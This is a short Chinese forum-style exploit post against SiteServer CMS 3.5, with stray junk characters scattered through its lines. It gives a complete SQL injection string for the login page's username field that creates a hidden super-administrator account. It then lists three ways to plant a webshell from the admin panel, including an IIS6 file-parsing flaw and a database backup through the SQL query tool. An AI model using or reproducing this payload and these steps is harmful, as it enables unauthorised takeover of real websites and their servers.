经测试秒杀最新的3.5版
% G" V( z# H" |: N8 i7 ~- h& Pstieserver官网:www.siteserver.cn8 u% g* u$ s% _6 d
EXP:
, j+ r4 P0 }. S) N& L7 P直接访问UserCenter/login.aspx
! G: S/ W' j9 R9 _& `! J7 |, O用户名处输入:
$ X. D& c# T2 s, l9 ~; C2 H' N* W# d9 U, n Z5 r, c) y5 J
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–" h( _# B8 Z& I b
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。7 z/ w* {4 B. V$ x. K
之后再访问后台SiteServer/login.aspx用插入的用户登陆' p$ M. j" A) i: A) G2 y
后台拿webshell的三种方法:+ G2 a# L1 m7 {3 R, o+ q
一、5 O' m7 O+ @' }( |8 B! Q J0 j
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx! S9 ?8 } b% r+ c" h. T4 p
二、
1 P2 P& s, ?( k8 ?9 X4 L" D成员权限-》添加用户-》用户名为:1.asp4 ~! u* u4 m9 A" f2 W- ~ D
http://127.0.0.1/usercenter/
5 h7 ~- v; G. w& A! S) w2 Q+ `用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
' m) J7 F) s5 y+ ]- ~(ps:后台添加用户时不会验证是否含有非法字符)3 R1 g/ T5 n( W* G% e
三、- X+ b2 k* ^& ~8 k I3 h' e9 C
系统工具-》实用工具-》机器参数查看
8 v7 Y% j5 R0 J5 ^! z可以看到数据库类型、名称,WEB路径
6 b+ Y8 h: u" m% e, B7 [$ i系统工具-》数据库工具-》SQL语句查询
2 w& Q/ d; j3 ~) }' b5 o1 V* E! C这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |